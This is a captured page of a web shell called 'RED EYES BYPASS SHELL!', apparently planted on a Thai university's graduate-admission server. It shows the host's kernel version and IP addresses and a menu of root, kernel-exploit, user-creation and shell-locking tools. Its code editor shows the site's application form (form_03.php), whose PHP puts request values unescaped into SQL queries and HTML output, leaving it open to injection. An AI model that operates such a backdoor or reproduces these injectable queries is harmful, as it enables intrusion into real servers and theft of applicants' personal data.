Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
grad /
apply /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
PDF
[ DIR ]
drwxr-xr-x
Upload_File
[ DIR ]
drwxrwxrwx
conn
[ DIR ]
drwxr-xr-x
file
[ DIR ]
drwxr-xr-x
fpdf_20231021
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
PDF01.php
17.92
KB
-rwxr-xr-x
_TT_FN.php
201
B
-rwxr-xr-x
form_00.php
21.52
KB
-rwxr-xr-x
form_01.php
13.92
KB
-rwxr-xr-x
form_02.php
23.02
KB
-rwxr-xr-x
form_03.php
28.4
KB
-rwxr-xr-x
form_04.php
2.88
KB
-rwxr-xr-x
form_05.php
364
B
-rwxr-xr-x
form_06.php
3.63
KB
-rwxr-xr-x
form_07.php
2.14
KB
-rwxr-xr-x
form_08.php
14.31
KB
-rwxr-xr-x
index.php
3.58
KB
-rwxr-xr-x
info.php
25
B
-rwxr-xr-x
menu_bar.php
1.92
KB
-rwxr-xr-x
style.php
5.35
KB
-rwxr-xr-x
upd_03.php
11.07
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : form_03.php
<form name="frm_set" action="upd_03.php" method="post" enctype="multipart/form-data"> <input type="hidden" value='active' name='frm03'> <?php if(isset($_REQUEST['course_name'])){$course_name=trim($_REQUEST['course_name']);}else{$course_name='';} if(isset($_REQUEST['_term'])){$_term=trim($_REQUEST['_term']);}else{$_term='';} if(isset($_REQUEST['pid'])){$pid=trim($_REQUEST['pid']);}else{$pid='';} if(isset($_REQUEST['name_th'])){$name_th=trim($_REQUEST['name_th']);}else{$name_th='';} if(isset($_REQUEST['name_en'])){$name_en=trim($_REQUEST['name_en']);}else{$name_en='';} if(isset($_REQUEST['provinces'])){$provinces=trim($_REQUEST['provinces']);}else{$provinces='';} if(isset($_REQUEST['amphures'])){$amphures=trim($_REQUEST['amphures']);}else{$amphures='';} if(isset($_REQUEST['districts'])){$districts=trim($_REQUEST['districts']);}else{$districts='';} if(isset($_REQUEST['day0'])){$day0=trim($_REQUEST['day0']);}else{$day0='';} if(isset($_REQUEST['month0'])){$month0=trim($_REQUEST['month0']);}else{$month0='';} if(isset($_REQUEST['year0'])){$year0=trim($_REQUEST['year0']);}else{$year0='';} if(isset($_REQUEST['nationality'])){$nationality=trim($_REQUEST['nationality']);}else{$nationality='';} if(isset($_REQUEST['ethnicity'])){$ethnicity=trim($_REQUEST['ethnicity']);}else{$ethnicity='';} if(isset($_REQUEST['religion'])){$religion=trim($_REQUEST['religion']);}else{$religion='';} if(isset($_REQUEST['grad'])){$grad=trim($_REQUEST['grad']);}else{$grad='';} if(isset($_REQUEST['day1_w'])){$day1_w=trim($_REQUEST['day1_w']);}else{$day1_w='';} if(isset($_REQUEST['month1_w'])){$month1_w=trim($_REQUEST['month1_w']);}else{$month1_w='';} if(isset($_REQUEST['year1_w'])){$year1_w=trim($_REQUEST['year1_w']);}else{$year1_w='';} if(isset($_REQUEST['educational'])){$educational=trim($_REQUEST['educational']);}else{$educational='';} if(isset($_REQUEST['field_of_study'])){$field_of_study=trim($_REQUEST['field_of_study']);}else{$field_of_study='';} if(isset($_REQUEST['institution'])){$institution=trim($_REQUEST['institution']);}else{$institution='';} if(isset($_REQUEST['occupation'])){$occupation=trim($_REQUEST['occupation']);}else{$occupation='';} if(isset($_REQUEST['work'])){$work=trim($_REQUEST['work']);}else{$work='';} if(isset($_REQUEST['tel'])){$tel=trim($_REQUEST['tel']);}else{$tel='';} if(isset($_REQUEST['email'])){$email=trim($_REQUEST['email']);}else{$email='';} if(isset($_REQUEST['addre'])){$addre=trim($_REQUEST['addre']);}else{$addre='';} ?> <table border='0.1'> <tr> <td colspan='2'><font face='TH SarabunPSK' style='font-size: 24px' ><b><u>ลงทะเบียนสมัครสอบคัดเลือกเข้าศึกษาระดับบัณฑิตศึกษา ภาคพิเศษ มหาวิทยาลัยราชภัฏราชนครินทร์ (กรอกทุกรายการ)</u></b></font></td> </tr> <tr> <td width='260' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >ปีการศึกษา</font></td> <td> <select name="_term"> <option value="ภาคการศึกษาที่ 1 ปีการศึกษา 2569" <?php IF(trim($_term)=='ภาคการศึกษาที่ 1 ปีการศึกษา 2569'){echo 'selected';} ?> >ภาคการศึกษาที่ 1 ปีการศึกษา 2569</option> </select> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='260' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >หลักสูตรที่สมัคร</font></td> <td> <select name="course_name"> <option value="">----- เลือก -----</option> <!-- <option value="010" <?php IF(trim($course_name)=='010'){echo 'selected';} ?> >หลักสูตร ปร.ด. สาขาวิชาวิทยาศาสตร์และนวัตกรรมเพื่อการพัฒนา</option> --> <!-- <option value="020" <?php IF(trim($course_name)=='020'){echo 'selected';} ?> >หลักสูตร ค.ม. สาขาวิชาการบริหารการศึกษา</option> --> <option value="031" <?php IF(trim($course_name)=='031'){echo 'selected';} ?> >หลักสูตร ค.ม. สาขาวิชาหลักสูตรและการสอน (แบบขอรับใบอนุญาตประกอบวิชาชีพครู)</option> <option value="032" <?php IF(trim($course_name)=='032'){echo 'selected';} ?> >หลักสูตร ค.ม. สาขาวิชาหลักสูตรและการสอน (แบบไม่ขอรับใบอนุญาตประกอบวิชาชีพครู)</option> <!-- <option value="040" <?php IF(trim($course_name)=='040'){echo 'selected';} ?> >หลักสูตร บธ.ม. สาขาวิชาบริหารธุรกิจ</option> --> <!-- <option value="050" <?php IF(trim($course_name)=='050'){echo 'selected';} ?> >หลักสูตร ส.ม. สาขาวิชาการจัดการสุขภาพ</option> --> <!-- <option value="060" <?php IF(trim($course_name)=='060'){echo 'selected';} ?> >หลักสูตร วท.ม. สาขาวิชาวิทยาศาสตร์และนวัตกรรมเพื่อการพัฒนา</option> --> </select> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >เลขประจำตัวประชาชน</font></td> <td><input type="text" name="pid" value="<?php echo $pid; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 19px' color='#a4a4a4'> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> ๑๒๔๐๖๐๐๐๑๒๑๒๓</td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >คำนำหน้า ชื่อ นามสกุล (ภาษาไทย)</font></td> <td><input type="text" name="name_th" value="<?php echo $name_th; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 19px' color='#a4a4a4'> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> นายตั้งใจ เรียนดี</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >คำนำหน้า ชื่อ นามสกุล (ภาษาอังกฤษ)</font></td> <td><input type="text" name="name_en" value="<?php echo $name_en; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 19px' color='#a4a4a4'> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> Tangjai Reandee</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >วัน-เดือน-ปี เกิด</font></td> <td> <select name="day0"> <?php $bd=''; for ($i=1; $i<=31; $i++) { if(trim($day0)==""){$day0=$d;} ?> <option value="<?php echo $i;?>"<?php if($i==$day0){echo 'selected';}?>> <?php echo $i; ?> </option> <?php } ?> </select> <select name="month0"> <?php for ($i=1; $i<=12; $i++) { if(trim($month0)==""){$month0=$m;} ?> <option value="<?php echo $i;?>"<?php if($i==$month0){echo 'selected';}?>> <?php echo $thai[$i]; ?> </option> <?php } ?> </select> <select name="year0"> <?php for ($i=2450; $i<=$y; $i++) //ปีที่เริ่ม 2490 ถึงปีปัจจุบัน { if(trim($year0)==""){$year0=$y;} ?> <option value="<?php echo $i; ?>"<?php if($i==$year0){echo 'selected';}?>> <?php echo $i; ?> </option> <?php } ?> </select> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' colspan='2' align='center'> <font face='TH SarabunPSK' style='font-size: 22px' > สัญชาติ<input type="text" name="nationality" value="<?php echo $nationality; ?>" size='13'> เชื้อชาติ<input type="text" name="ethnicity" value="<?php echo $ethnicity; ?>" size='13'> ศาสนา<input type="text" name="religion" value="<?php echo $religion; ?>" size='13'> เกรดเฉลี่ย<input type="text" name="grad" value="<?php echo $grad; ?>" size='13'> </font> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> </td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >วันที่สำเร็จการศึกษา</font></td> <td> <select name="day1_w"> <?php $bd=''; for ($i=1; $i<=31; $i++) { if(trim($day1_w)==""){$day1_w=$d;} ?> <option value="<?php echo $i;?>"<?php if($i==$day1_w){echo 'selected';}?>> <?php echo $i; ?> </option> <?php } ?> </select> <select name="month1_w"> <?php for ($i=1; $i<=12; $i++) { if(trim($month1_w)==""){$month1_w=$m;} ?> <option value="<?php echo $i;?>"<?php if($i==$month1_w){echo 'selected';}?>> <?php echo $thai[$i]; ?> </option> <?php } ?> </select> <select name="year1_w"> <?php for ($i=2450; $i<=$y; $i++) //ปีที่เริ่ม 2490 ถึงปีปัจจุบัน { if(trim($year1_w)==""){$year1_w=$y;} ?> <option value="<?php echo $i; ?>"<?php if($i==$year1_w){echo 'selected';}?>> <?php echo $i; ?> </option> <?php } ?> </select> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >วุฒิการศึกษาที่ใช้สมัคร</font></td> <td><input type="text" name="educational" value="<?php echo $educational; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 19px' color='#a4a4a4'> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> ระบุวุฒิย่อ เช่น ค.บ.</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >สาขาวิชา</font></td> <td><input type="text" name="field_of_study" value="<?php echo $field_of_study; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >จบจากสถาบันการศึกษา</font></td> <td><input type="text" name="institution" value="<?php echo $institution; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >อาชีพปัจจุบันของผู้สมัคร</font></td> <td><input type="text" name="occupation" value="<?php echo $occupation; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >ชื่อสถานที่ทำงาน</font></td> <td><input type="text" name="work" value="<?php echo $work; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >โทรศัพท์ที่สามารถติดต่อได้</font></td> <td><input type="text" name="tel" value="<?php echo $tel; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >อีเมล (ใช้แจ้งเตือนสถานะ)</font></td> <td><input type="text" name="email" value="<?php echo $email; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >ที่อยู่ปัจจุบันที่สามารถติดต่อได้</font></td> <td><input type="text" name="addre" value="<?php echo $addre; ?>" size='28'><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='260' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >จังหวัด</font></td> <td> <select name="provinces" onChange='_pro01();'> <option value=''>-- เลือก --</option> <?php $sql="select * from provinces"; $result=mysqli_query($con,$sql); while($row=mysqli_fetch_array($result,MYSQLI_ASSOC)) { $name_th=$row["name_th"]; $name_en=$row['name_en']; $id=$row['id']; ?> <option value='<?php echo $id; ?>' <?php IF(trim($provinces)==$id){echo 'selected';} ?>><?php echo $name_th; ?></option> <?php } ?> </select> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='260' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >อำเภอ</font></td> <td> <select name='amphures' onChange='_pro02();'> <option value=''>-- เลือก --</option> <?php $sql="select * from amphures where province_id='".trim($provinces)."' "; $result=mysqli_query($con,$sql); while($row=mysqli_fetch_array($result,MYSQLI_ASSOC)) { $name_th=$row["name_th"]; $name_en=$row['name_en']; $id=$row['id']; ?> <option value='<?php echo $id; ?>' <?php IF(trim($amphures)==$id){echo 'selected';} ?>><?php echo $name_th; ?></option> <?php } ?> </select> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='260' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >ตำบล</font></td> <td> <select name="districts" onChange='_pro03();'> <option value=''>-- เลือก --</option> <?php $sql="select * from districts where amphure_id='".trim($amphures)."' "; $result=mysqli_query($con,$sql); while($row=mysqli_fetch_array($result,MYSQLI_ASSOC)) { $name_th=$row["name_th"]; $name_en=$row['name_en']; $zip_code=$row['zip_code']; $id=$row['id']; ?> <option value='<?php echo $id; ?>' <?php IF(trim($districts)==$id){echo 'selected';} ?>><?php echo $name_th." -->".$zip_code; ?></option> <?php } ?> </select> <?php //echo "รหัสไปรษณีย์ : ".$zipp; ?> <font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >รูปถ่ายผู้สมัคร ขนาด 1 นิ้ว</font></td> <td><input type="file" name="file001" id="file001"><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> <font face='TH SarabunPSK' style='font-size: 22px' color='black'>รูปถ่ายหน้าตรงไม่สวมหมวก และแว่นตาสีดำ</font></td> </tr> <!-- <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >สำเนาใบรับรองผลการศึกษา(transcript)</font></td> <td><input type="file" name="file002" id="file002"><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> <font face='TH SarabunPSK' style='font-size: 22px' color='black'>พร้อมรับรองสำเนา</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >สำเนาใบปริญญาบัตร</font></td> <td><input type="file" name="file003" id="file003"><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> <font face='TH SarabunPSK' style='font-size: 22px' color='black'>พร้อมรับรองสำเนา</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >สำเนาบัตรประจำตัวประชาชน</font></td> <td><input type="file" name="file004" id="file004"><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font> <font face='TH SarabunPSK' style='font-size: 22px' color='black'>พร้อมรับรองสำเนา</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >หลักฐานการเปลี่ยนชื่อ-นามสกุล</font></td> <td><input type="file" name="file005" id="file005"><font face='TH SarabunPSK' style='font-size: 22px' >(ถ้ามีการเปลี่ยนแปลง)พร้อมรับรองสำเนา</font></td> </tr> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >หลักฐานทดสอบความรู้ภาษาอังกฤษ</font></td> <td><input type="file" name="file008" id="file008"><font face='TH SarabunPSK' style='font-size: 22px' >(ถ้ามี)พร้อมรับรองสำเนา</font></td> </tr> --> <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >สลิปใบเสร็จโอนเงิน</font></td> <td><input type="file" name="file006" id="file006"><font face='TH SarabunPSK' style='font-size: 22px' color='red'>***</font></td> </tr> <!-- <tr> <td width='' align='right'><font face='TH SarabunPSK' style='font-size: 22px' >หนังสือรับรองจากหน่วยงาน</font></td> <td><input type="file" name="file007" id="file007"><font face='TH SarabunPSK' style='font-size: 22px' color='black'>เฉพาะสาขาวิชาการบริหารการศึกษา</font></td> </tr> --> <tr> <td colspan='2' align='center'><center><b><font face='TH SarabunPSK' style='font-size: 18px' color='#ff5722'>หมายเหตุ :: กรุณาอัปโหลดไฟล์ขนาดไม่เกิน 2 MB (เฉพาะ .png .jpg .pdf) </font></b></center></td> </tr> <tr> <td colspan='2' align='center'><center><b><font face='TH SarabunPSK' style='font-size: 18px' color='#ff5722'>กรุณาตั้งชื่อไฟล์อัปโหลด ทุกไฟล์เป็นภาษาอังกฤษหรือตัวเลขเท่านั้น A-Z หรือ 0-9 (ไม่ต้องเว้นวรรค)</font></b></center></td> </tr> <tr> <td colspan='2' align='center'><center><b><font face='TH SarabunPSK' style='font-size: 18px' color='#ff5722'>เช่น Tangjai001 หรือ 001.png , 002.pdf , 003.pdf</font></b></center></br></td> </tr> <tr> <td colspan='2' align=''><hr color='red' width='395'></td> </tr> <tr bgcolor=' #e0e0e0'> <td colspan='2' align=''></br> <b><font face='TH SarabunPSK' style='font-size: 20px' color='000000'>ข้าพเจ้าขอรับรองว่า ข้อความทั้งหมดข้างต้นเป็นความจริงทุกประการ</font></b> <font face='TH SarabunPSK' style='font-size: 20px' color='000000'> </br> หากมหาวิทยาลัยราชภัฏราชนครินทร์ตรวจสอบพบว่าคุณวุฒิและคุณสมบัติของข้าพเจ้าไม่ตรงตามที่มหาวิทยาลัยกำหนด หรือ ตรวจพบว่ามีการปลอมแปลงเอกสาร </br> ข้าพเจ้ายินยอมให้ทางมหาวิทยาลัย เพิกถอนสิทธิ์ การสมัครสอบคัดเลือกทุกประการ </br> ข้าพเจ้ายินยอมให้มหาวิทยาลัยนำข้อมูลในใบสมัครของข้าพเจ้าไปใช้ประโยชน์ ตามที่มหาวิทยาลัยพิจารณาเห็นสมควร</br> </font></br> <font face='TH SarabunPSK' style='font-size: 20px' color='000000'> <input type="checkbox" name="_chk" value="Y">ข้าพเจ้าได้อ่านและยอมรับตาม <a href='file/privacy_notice.pdf' target='_blank' style='text-decoration:none'><b><font face='TH SarabunPSK' style='font-size: 20px' color='red'> หนังสือแจ้งการประมวลผลข้อมูลส่วนบุคคล </font></b> <font face='TH SarabunPSK' style='font-size: 20px' color='000000'> และ </font> <a href='file/consent_notice.pdf' target='_blank' style='text-decoration:none'><b><font face='TH SarabunPSK' style='font-size: 20px' color='red'> หนังสือยินยอมให้เก็บรวบรวม ใช้ หรือเปิดเผยข้อมูลส่วนบุคคล </font></b> </br> </font></br> </td> </tr> <tr><td colspan='2' align='center'><hr color='red' width='395'> <button type="button" onClick="smt();" class="button1 button6">บันทึก</button> <button type="reset" class="button2 button6">ยกเลิก</button> </br></br></br></br></br> </td> </tr> <!-- <tr> <td colspan='2' align='center'><center><font face='TH SarabunPSK' style='font-size: 5px' color='ffffff'>.</font></b></center></td> </tr> --> </table> </form> <script language="javascript"> var dForm=self.document.frm_set; function _pro01(){ //alert('mmm'); self.location.replace('index.php?frm03='+dForm.frm03.value+'&course_name='+dForm.course_name[dForm.course_name.selectedIndex].value+'&_term='+dForm._term[dForm._term.selectedIndex].value+'&pid='+dForm.pid.value+'&name_th='+dForm.name_th.value+'&name_en='+dForm.name_en.value+'&provinces='+dForm.provinces[dForm.provinces.selectedIndex].value+'&hures='+dForm.amphures[dForm.amphures.selectedIndex].value+'&districts='+dForm.districts[dForm.districts.selectedIndex].value+'&day0='+dForm.day0[dForm.day0.selectedIndex].value+'&month0='+dForm.month0[dForm.month0.selectedIndex].value+'&year0='+dForm.year0[dForm.year0.selectedIndex].value+'&nationality='+dForm.nationality.value+'ðnicity='+dForm.ethnicity.value+'&religion='+dForm.religion.value+'&grad='+dForm.grad.value+'&day1_w='+dForm.day1_w[dForm.day1_w.selectedIndex].value+'&month1_w='+dForm.month1_w[dForm.month1_w.selectedIndex].value+'&year1_w='+dForm.year1_w[dForm.year1_w.selectedIndex].value+'&educational='+dForm.educational.value+'&field_of_study='+dForm.field_of_study.value+'&institution='+dForm.institution.value+'&occupation='+dForm.occupation.value+'&work='+dForm.work.value+'&tel='+dForm.tel.value+'&email='+dForm.email.value+'&addre='+dForm.addre.value); } function _pro02(){ //alert('mmm'); self.location.replace('index.php?frm03='+dForm.frm03.value+'&course_name='+dForm.course_name[dForm.course_name.selectedIndex].value+'&_term='+dForm._term[dForm._term.selectedIndex].value+'&pid='+dForm.pid.value+'&name_th='+dForm.name_th.value+'&name_en='+dForm.name_en.value+'&provinces='+dForm.provinces[dForm.provinces.selectedIndex].value+'&hures='+dForm.amphures[dForm.amphures.selectedIndex].value+'&districts='+dForm.districts[dForm.districts.selectedIndex].value+'&day0='+dForm.day0[dForm.day0.selectedIndex].value+'&month0='+dForm.month0[dForm.month0.selectedIndex].value+'&year0='+dForm.year0[dForm.year0.selectedIndex].value+'&nationality='+dForm.nationality.value+'ðnicity='+dForm.ethnicity.value+'&religion='+dForm.religion.value+'&grad='+dForm.grad.value+'&day1_w='+dForm.day1_w[dForm.day1_w.selectedIndex].value+'&month1_w='+dForm.month1_w[dForm.month1_w.selectedIndex].value+'&year1_w='+dForm.year1_w[dForm.year1_w.selectedIndex].value+'&educational='+dForm.educational.value+'&field_of_study='+dForm.field_of_study.value+'&institution='+dForm.institution.value+'&occupation='+dForm.occupation.value+'&work='+dForm.work.value+'&tel='+dForm.tel.value+'&email='+dForm.email.value+'&addre='+dForm.addre.value); } function _pro03(){ //alert('mmm'); self.location.replace('index.php?frm03='+dForm.frm03.value+'&course_name='+dForm.course_name[dForm.course_name.selectedIndex].value+'&_term='+dForm._term[dForm._term.selectedIndex].value+'&pid='+dForm.pid.value+'&name_th='+dForm.name_th.value+'&name_en='+dForm.name_en.value+'&provinces='+dForm.provinces[dForm.provinces.selectedIndex].value+'&hures='+dForm.amphures[dForm.amphures.selectedIndex].value+'&districts='+dForm.districts[dForm.districts.selectedIndex].value+'&day0='+dForm.day0[dForm.day0.selectedIndex].value+'&month0='+dForm.month0[dForm.month0.selectedIndex].value+'&year0='+dForm.year0[dForm.year0.selectedIndex].value+'&nationality='+dForm.nationality.value+'ðnicity='+dForm.ethnicity.value+'&religion='+dForm.religion.value+'&grad='+dForm.grad.value+'&day1_w='+dForm.day1_w[dForm.day1_w.selectedIndex].value+'&month1_w='+dForm.month1_w[dForm.month1_w.selectedIndex].value+'&year1_w='+dForm.year1_w[dForm.year1_w.selectedIndex].value+'&educational='+dForm.educational.value+'&field_of_study='+dForm.field_of_study.value+'&institution='+dForm.institution.value+'&occupation='+dForm.occupation.value+'&work='+dForm.work.value+'&tel='+dForm.tel.value+'&email='+dForm.email.value+'&addre='+dForm.addre.value); } function smt(){ var myMSG = ""; if(dForm.pid.value=='') { myMSG = myMSG + '\n -- โปรดระบุเลขประจำตัวประชาชน ';} if(dForm.name_th.value=='') { myMSG = myMSG + '\n -- โปรดระบุชื่อ-นามสกุล(ไทย) ';} if(dForm.name_en.value=='') { myMSG = myMSG + '\n -- โปรดระบุชื่อ-นามสกุล(อังกฤษ) ';} if(dForm.nationality.value=='') { myMSG = myMSG + '\n -- โปรดระบุสัญชาติ ';} if(dForm.ethnicity.value=='') { myMSG = myMSG + '\n -- โปรดระบุเชื้อชาติ ';} if(dForm.religion.value=='') { myMSG = myMSG + '\n -- โปรดระบุศาสนา ';} if(dForm.grad.value=='') { myMSG = myMSG + '\n -- โปรดระบุเกรดเฉลี่ย ';} if(dForm.educational.value=='') { myMSG = myMSG + '\n -- โปรดระบุวุฒิการศึกษาที่ใช้สมัคร ';} if(dForm.field_of_study.value=='') { myMSG = myMSG + '\n -- โปรดระบุสาขาวิชา ';} if(dForm.institution.value=='') { myMSG = myMSG + '\n -- โปรดระบจบจากสถาบันการศึกษา ';} if(dForm.occupation.value=='') { myMSG = myMSG + '\n -- โปรดระบุอาชีพปัจจุบัน ';} if(dForm.work.value=='') { myMSG = myMSG + '\n -- โปรดระบสถานที่ทำงาน ';} if(dForm.tel.value=='') { myMSG = myMSG + '\n -- โปรดระบุหมายเลขโทรศัพท์ ';} if(dForm.email.value=='') { myMSG = myMSG + '\n -- โปรดระบุอีเมล ';} if(dForm.addre.value=='') { myMSG = myMSG + '\n -- โปรดระบที่อยู่ ';} if(dForm._chk.checked=='') { myMSG = myMSG + '\n -- โปรดยอมรับเงื่อนไขการสมัคร ';} //if(dForm.file001.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลดรูปถ่าย ';} //if(dForm.file002.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลด(transcript) ';} //if(dForm.file003.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลดใบปริญญาบัตรุ ';} //if(dForm.file004.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลดสำเนาบัตรประจำตัวประชาชนุ ';} //if(dForm.file005.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลดหลักฐานการเปลี่ยนชื่อ-นามสกุล ';} //if(dForm.file008.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลดหลักฐานการเปลี่ยนชื่อ-นามสกุล ';} //if(dForm.file006.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลดสลิปใบเสร็จโอนเงิน ';} //if(dForm.file007.value=='') { myMSG = myMSG + '\n -- โปรดอัพโหลดหลักฐานหนังสือรับรองจากหน่วยงาน ';} if(myMSG != "" ){ alert('เกิดข้อผิดพลาด !!! '+myMSG); return false; }else { //alert('The mild'); dForm.submit(); } } </script> <script type="text/javascript"> function FocusOnInput() {document.getElementById("InputID").focus();} </script>
Close